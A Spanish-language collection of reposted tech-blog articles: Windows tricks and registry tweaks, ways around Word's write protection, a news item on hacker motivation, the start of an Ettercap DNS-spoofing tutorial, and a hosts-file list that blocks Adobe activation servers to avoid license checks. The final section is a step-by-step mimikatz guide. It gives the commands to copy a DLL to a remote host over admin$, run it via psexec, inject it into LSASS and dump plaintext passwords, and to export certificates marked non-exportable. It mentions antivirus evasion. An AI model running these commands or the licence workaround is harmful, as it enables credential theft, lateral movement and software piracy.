10 trucos ocultos en tu PC

Sácale el mayor provecho posible a tu equipo de cómputo con los siguientes tips y secretos develados

Hoy en día, prácticamente nadie puede realizar sus labores sin ayuda de una computadora. Pasamos tantas horas pegados a uno de estos aparatos que prácticamente resulta imposible que no conozcamos su funcionamiento.


Así que hablar de secretos de una PC suena extraño y a la vez, pareciera algo imposible. Sin embargo, no todas las personas tuvieron la suerte, por así decirlo, de nacer en una generación completamente tecnológica, y por ello, dominar este tipo de sistemas no les es tan sencillo.


Iniciamos.

1. Hacer rastro de imagen en Paint. Lo primero que hay que hacer es abrir una imagen con este programa. Posteriormente, elige una parte de la misma con la herramienta de cortar y comienza a arrastrarla por donde quieras, sin dejar de presionar la tecla shift.


Haciendo esto, verás que dejarás un rastro de la imagen por todos lados en donde estuviste arrastrándola.


2. Ganar siempre en el buscaminas. Antes que nada, deberás cambiar el fondo de tu computadora a uno obscuro. Cierra todas las ventanas; abre el buscaminas y escribe lo siguiente: xyzzy.


Cuando pases el mouse sobre el juego, sin presionar nada, notarás que en la parte superior izquierda de la pantalla hay un puntito blanco cuando cruces por una casilla que no tenga mina; si pasas donde hay una, el punto desaparecerá.

3. Hacer tus propios caracteres. Esto es algo sencillo. Lo único que hay que hacer es ir al comando "Ejecutar" y ahí deberás escribir esto: eudcedit.exe. Al darle enter, se abrirá un editor de caracteres privados, en donde podrás diseñar tus propios caracteres.


4. Restricciones del escritorio. Algunas cosas del escritorio activo puedes controlarlas o deshabilitarlas una por una, para así evitar que alguien, por ocioso, decida meter mano y cambie tus preferencias.


Tendrás que habilitar la edición del registro de sistema, cuando en "Ejecutar" escribas el comando regedit.exe. A continuación te aparecerá esto: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ActiveDesktop, en donde modificarás los valores de DWord ya existentes, es decir, poner 1 y 0 para activar o desactivar las restricciones.

5. Borrar de la memoria RAM las DLL que no se utilizan. Cuando se cierra un programa que usaba DLL's, estas se quedan cargadas en la memoria, sólo ocupando espacio, pues no tienen ninguna utilidad, lo cual se traduce a que tu máquina sea un poco más lenta.


Hay un truco para borrarlas automáticamente. Lo único que necesitas es ir a "Ejecutar" y nuevamente escribir regedit.exe. En el registro de Windows deberás desplazarte en las siguientes claves: HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer


En el panel de la derecha, da clic con el botón derecho del ratón en "Nuevo" y "Valor alfanumérico". Escribe AlwaysUnloadDll y das enter para que se cree este nuevo nombre. Deberás hacer doble clic en este valor nuevo y en la ventana que aparecerá, teclea 1 y das aceptar. Cierra todo y reinicia la computadora.


6. Quitar los candados de Word. Seguramente te ha pasado que has querido editar un texto que sólo puede leerse y está protegido contra escritura. ¿Qué se puede hacer en esos casos? Existen dos maneras de "burlar" este código de seguridad.


Primero deberás abrir una página en blanco de MS Word; en el menú te diriges a "Archivo", ahí das clic en "Insertar", en donde seleccionarás el documento protegido. Posteriormente en "Herramientas", seleccionas la opción "documento sin proteger" y listo.


La segunda opción es que abras el documento en Word, le des guardar como "Sitio web" y cierras el programa. Abres nuevamente el documento con un navegador, lo copias y lo pegas en una nueva hoja de Word.

7. Cómo ver las sugerencias del día. Windows proporciona a los usuarios las "Sugerencias del día", las cuales están ocultas. Para checar su contenido, deberás dar doble clic en "Mi PC", ahí irás a "Ver" y pon el cursor en la barra del explorador y ahí, da clic en "Sugerencia del día".


De forma automática, en otro panel que aparecerá en la parte inferior de la ventana podrás ver la primera sugerencia que el sistema ofrece.


8. Guardar una animación Flash. Seguro que has querido guardar en tu computadora alguna animación creada por Flash, sin que hayas tenido mucho éxito, pues al momento de abrirla, no funciona.


Para que esto no suceda, lo primero que deberás hacer es borrar los archivos temporales de Internet. Busca en ellos todos los que tengan la extensión .SWF. Cópialos en cualquier otro directorio y da doble clic en cada uno. Aparecerá un pantalla y un diálogo que dice "Abrir con", ahí elegirás el navegador que frecuentemente utilizas y a partir de ese momento, podrás ver la animación cuantas veces quieras, sin necesidad de estar conectado.

9. Evitar el cierre forzoso de aplicaciones. No hay nada más desesperante que tener que esperar a que se cierren todos los programas para poder apagar definitivamente el equipo.


Si quieres evitar esto, ve a "Inicio", da clic en "Ejecutar" y escribes regedit.exe y das enter. Buscas la ruta HKEY_CURRENT_USER -> Control Panel -> Desktop y localiza la clave "AutoEndTask"; da doble clic sobre la misma y cambia el valor 0 por 1.


10. Borrar cualquier archivo sin necesidad de utilizar la papelera de reciclaje. Cuando quieres deshacerte definitivamente de un archivo, primero tendrás que enviarlo a la papelera de reciclaje y después, "vaciarla".


Borrar un archivo definitivamente también podrás hacerlo definitivamente si mientras das clic en "Eliminar" mantienes presionada la tecla de Mayúsculas.

http://de10.com.mx

¿Qué motiva a un verdadero hacker?

• Se trata de una persona curiosa, paciente y creativa que investiga y no se detiene hasta controlar un sistema o perfeccionar su técnica.
• El término se aplica a desarrolladores de software apasionados por la informática que depuran y arreglan errores en los sistemas.
• También a aquellos que se infiltran en un sistema informático con el fin de eludir o desactivar las medidas de seguridad.

La motivación del verdadero hacker es el puro conocimiento de una persona curiosa, paciente y creativa que investiga y no se detiene hasta controlar un sistema o perfeccionar su técnica, según el último informe del Instituto Nacional de Tecnologías de la Comunicación (Inteco) sobre esta figura.

El estudio ha añadido que la palabra se utiliza tanto para definir a un desarrollador de software apasionado por la informática que depura y arregla errores en los sistemas, como para referirse a aquel que se infiltra en un sistema informático con el fin de eludir o desactivar las medidas de seguridad.El texto, de carácter divulgativo, tiene el objetivo de aportar más información sobre una figura tan ligada al mundo de la seguridad informática y ha señalado que actualmente "el término hacker puede tener connotaciones positivas y negativas en función del concepto que se maneje", según ha detallado esta semana Inteco en un comunicado.

Este análisis aborda los diferentes aspectos del 'hacking' y sus motivaciones y ha detallado si los objetivos del hacker soneconómicos o de otro tipo "se debería encasillar" a esta figura "en subtipos dentro de la cultura hacker", según el instituto estatal.

El documento concluye con una atención a la profesionalización de esta figura y diferencia, por un lado, el llamado 'hacking ético', que engloba todos aquellos servicios prestados para la seguridad de las empresas tanto por hackers como por consultores y expertos en seguridad y, por otro, el mercado negro y la ciberdelincuencia organizada.

En este último aspecto, el informe indica que "cuando el mercado no puede absorber en empresas lícitas el conocimiento de las personas con talento hacker, pueden aparecer otras organizaciones que intenten rentabilizar sus habilidades en otras áreas orientadas a la criminalidad" que, como las mafias, "se dedican al lucro propio de forma profesional".

El Observatorio de la Seguridad de la Información del instituto, con sede en León, ha recordado que el 'hacking' está íntimamente ligado al nacimiento de Internet y a las oportunidades económicas, técnicas y sociales que supuso desde sus inicios en la década de los 60 y 70.

Fuente:  http://www.20minutos.es

DNS Spoofing con Ettercap en Backtrack5 – Tutorial

En este tutorial aprenderemos como verificar si alguna terminal de nuestra red es propensa a sufrir un ataque MITM (Man in the Middle), asi que primero que nada spoofing es muy diferente a sniffing, en el sniffing solo capturaremos o veremos los paquetes salientes de la red que estemos vigilando, mientras que Spoofing basicamente seremos una direccion de salida, basicamente podremos ser el router. Esto nos permitira hacer ciertos trucos…

Spoofing es una accion muy general, asi que hay varios tipos de spoofing, DNS spoofing, IP spoofing, y mas.

Que es DNS Spoofing?

DNS Spoofing es un ataque bajo la categoria MITM, ademas DNS Spoofing MIMA contien:

Envenenamiento ARP

Robo de sesiones

Robo de SSL

Spoofing de DNS

Cada ataque tiene su propia importancia, y las explicaremos en otro articulo cada uno. Pero por ahora sigamos con nuestro tutorial.




Ahora la pregunta es: Como realizar un spoofing de DNS, asi que para este tutorial ocuparemos Ettercap

Que es Ettercap?

De acuerdo al sitio oficial “Ettercap es una suite para pruebas MITM en redes LAN. se centra en vigilar en vivo conexiones y usando filtros para separar la informacion.”

Tiene soporte para Windows,Linux,BSD y OSX

Que necesitamos?:

Un sistema operativo (Linux o Windows)

Ettercap

Social Engineering Toolkit (SET)

Voy a ocupar Backtrack para este tutorial, ustedes puede usar cualquier otro OS, y ocupare el SET para poder hacerle spoof a mi IP y hacerla un sitio web.

Fuente : http://bluemot.com/blog/dns-spoofing-con-ettercap-en-backtrack5-tutorial/

Un saludo a los que lean este re-post.

Evitar que adobe Css5 se actualice

Evitar que  adobe Css5 se actualice  es algo sencillo primero si nos hemos bajado el pothoshop o el Dreamweaver que son los productos mas comunes, podemos estar seguros que siempre nos piden actualizarse , ya sea por que nuestro Internet esta lento o por que  simplemente no queremos dicha actualización , se nos hace fastidioso recibir las notificaciones de que son necesarias las actualizaciones de este paquete o producto de adobe, según el caso, bueno sin mas ni mas aquí esta la solución.

Modificaremos Hosts (por q por este podremos redirecionar adobe, para q no se actualize ni te detecten)

lo que tenemos que hacer es encontrar el archivo Hosts...
Esta es su ubicacion -> C:\WINDOWS\system32\drivers\etc\hosts
Cuando lo encuentres abrelo y te va a decir que con que programa lo quieres abrir, escoge el Bloc de Notas...
ahora te vas a ir a la parte de hasta abajo del archivo y veras que viene la siguiente linea de texto
localhost 127.0.0.1
esto quiere decir que es tu computadora sale??
Listo??
ahora nos falta decirle a adobe a que paginas se debe de ir cuando se intenta de conectar...
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 pagead2.googlesyndication.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
copia y pega esas paginas y numeros, esto lo que hace es que cuando se trate de conectar el programa a alguna de estas paginas lo va a mandar a tu computadora, no a la de Adobe...

Volcado de contraseñas con mimikatz

mimikatz es una herramienta que entre otras características permite el volcado de contraseñas en texto claro de un sistema Windows, la exportación de certificados marcados como no exportables o la obtención de hashes de la SAM.




Una de las principales ventajas que presenta frente a otras herramientas como wce, es que aún no es demasiado popular y los antivirus no la detectan como aplicación maliciosa. Tan solo 5 de 41 la tienen catalogada como tal. ¡A ver lo que dura!

Para ver cómo funciona, mejor ver algunos ejemplos de uso.




1.- Nombre de usuario y PC

Para empezar y ver la sintaxis, algo sencillo. Obtención del nombre de usuario y el PC.




a.- Iniciar mimikatz desde la ruta en la que se haya descargado e invocar el módulo system con el comando "user" para sacar el nombre de usuario: system::user




b.- El nombre del equipo con el comando "computer" del módulo system:system::computer. Sencillo, ¿verdad?

2.- Contraseñas en claro de un dominio.

Como es lógico, es necesario tener permisos de administrador ya que la herramienta no explota ninguna vulnerabilidad de escalada de privilegios. En este ejemplo se hará uso junto a psexec de sysinternals para el uso remoto contra la dirección IP remota: 172.16.X.X




a.- Se autentica contra el servidor remoto (del que se volcarán las contraseñas) mediante el comando: net use \\172.16.X.X\admin$ que solicitará las credenciales.




b.- Se copia la librería auxiliar "sekurla.dll" en el directorio System32 del sistema remoto, proporcionada con el propio mimikatz: copy sekurla.dll \\172.16.X.X\admin$\system32




c.- El tercer paso es la ejecución de mimikatz, usando la arquitectura que corresponda, ya sea 32 o 64 bits: psexec /accepteula \\172.16.X.X\ -c mimikatz.exe




d.- Una vez arrancado se verifica que hay acceso al privilegio: SeDebugPrivilege, con el comando: privilege::debug aunque esto no es necesario si se tiene acceso SYSTEM.

e.- Se procede a inyectar la librería en el proceso de LSASS: inject::process lsass.exe sekurlsa.dll




f.- Por último, se solicitan las contraseñas con: @getLogonPasswords

Solucionar el problema no es sencillo, ya que requiere deshabilitar los Security Support Providers (SSP) TsPkg y Wdigest de la clave: HKLM\SYSTEM\CurrentControlSet\Control\LSA\Security Packages en caso de Windows 7 y 2008, opción no soportada por Microsoft y que rompe el Network Level Authentication (NLA) de RDP, dejando este de funcionar.




3.- Exportación de certificados.

Para exportar certificados, marcados como NO exportables, mimikatz parchea la CryptoApi y luego intenta la exportación. El ejemplo para mi equipo local:




a.- Se arranca mimikatz ejecutando el binario de la arquitectura que corresponda:C:\tmp\mimikatzz\x64\mimikatz




b.- Igual que en el caso anterior, se verifica el acceso a SeDebugPrivilege mediante:privilege::debug que debe responder "OK".




c.- Se procede al parcheo de la CryptoApi con el comando: crypto::patchcapi




d.- Se intentan exportar dos veces los certificados con la instrucción: crypto::exportCertificatespero falla, indicándolo con un resultado "KO".




e.- Cuando esto ocurre, hay que probar varias veces a parchear la cryptoapi y exportar, hasta que funciona tal y como muestra la captura. Dependiendo de la versión de Windows, será necesario usarcrypto::patchcapi o por el contrario crypto::patchcng

Referencias:

http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html

http://computer-forensics.sans.org/blog/2012/03/09/protecting-privileged-domain-accounts-disabling-encrypted-passwords#

http://blog.gentilkiwi.com/mimikatz

Leer más: Segu-Info: Volcado de contraseñas con mimikatz http://blog.segu-info.com.ar/2012/07/volcado-de-contrasenas-con-mimikatz.html#ixzz20AtcDPA0
Under Creative Commons License: Attribution Non-Commercial Share Alike